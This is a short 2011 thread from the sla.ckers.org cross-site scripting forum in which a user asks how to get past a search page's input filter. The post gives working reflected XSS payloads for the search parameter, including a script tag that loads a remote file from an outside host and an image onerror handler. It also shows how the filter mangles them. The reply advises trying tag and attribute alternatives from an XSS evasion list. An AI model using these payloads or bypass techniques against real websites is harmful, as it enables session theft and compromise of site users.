Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
bypass a filter
Posted by: Mihaeils
Date: September 22, 2011 06:24PM

site.com/search/?a=1"/><script src=http://mysite.com/xss.js></script>
<input type="text" name="a" value="1"/><sc ript src=http://mysite.com/xss.js></script>" size="40" maxlength="50" />&nbsp;<input name="s" type="submit" value="Search" />


site.com/search/?a=1"/><img src=l onerror=prompt(1);>
<input type="text" name="a" value="1"/><img src=l one rror=prompt(1);>" size="40" maxlength="50" />&nbsp;<input name="s" type="submit" value="Search" />

is there any variants of realization?

Options: ReplyQuote
Re: bypass a filter
Posted by: Albino
Date: October 07, 2011 07:33AM

Looks like a blacklist of tags/properties. Try the alternatives on ha.ckers.org/xss.html

Options: ReplyQuote


Sorry, only registered users may post in this forum.